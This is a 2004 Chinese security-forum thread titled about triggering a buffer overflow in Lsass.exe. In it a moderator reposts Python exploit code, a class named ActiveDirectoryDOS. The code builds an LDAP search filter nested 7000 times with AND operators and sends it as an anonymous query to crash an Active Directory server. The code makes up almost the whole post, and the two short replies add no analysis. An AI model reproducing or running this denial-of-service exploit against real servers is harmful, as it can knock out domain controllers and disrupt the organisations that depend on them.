|
 | 作者: qiuyang [qiuyang]
 版主 |
登录 |
| class ActiveDirectoryDOS( Ldap ): def __init__(self): self._s = None self.host = '192.168.0.1' self.basedn = 'dc=bugweek,dc=corelabs,dc=core-sdi,dc=com' self.port = 389 self.buffer = '' self.msg_id = 1 Ldap.__init__() def generateFilter_BinaryOp( self, filter ): filterBuffer = asn1.OCTETSTRING(filter[1]).encode() + asn1.OCTETSTRING(filter[2]).encode() filterBuffer = self.encapsulateHeader( filter[0], filterBuffer ) return filterBuffer def generateFilter_RecursiveBinaryOp( self, filter, numTimes): simpleBinOp = self.generateFilter_BinaryOp( filter ) filterBuffer = simpleBinOp for cnt in range( 0, numTimes ): filterBuffer = self.encapsulateHeader( self.LDAP_FILTER_AND, filterBuffer + simpleBinOp ) return filterBuffer def searchSub( self, filterBuffer ): self.bindRequest() self.searchRequest( filterBuffer ) def run(self, host = '', basedn = '', name = '' ): # the machine must not exist machine_name = 'xaxax' filterComputerNotInDir = (Ldap.LDAP_FILTER_EQUALITY,'name',machine_name) # execute the anonymous query print 'executing query' filterBuffer = self.generateFilter_RecursiveBinaryOp( filterComputerNotInDir, 7000 ) self.searchSub( filterBuffer ) |
| 地主 发表时间: 04-06-15 19:59 |
| 回复: qiuyang [qiuyang] 版主 |
登录 |
|
这贴最初我发在[核心地带]到现在有一段时间了,现在发这[电脑门诊]供大家看看。 |
| B1层 发表时间: 04-06-15 20:02 |
 | 回复: yao73041 [yao73041]  论坛用户 |
登录 |
晕!! |
| B2层 发表时间: 04-06-17 23:46 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 电脑门诊
标题: 从触发缓冲区溢出看Lsass.exe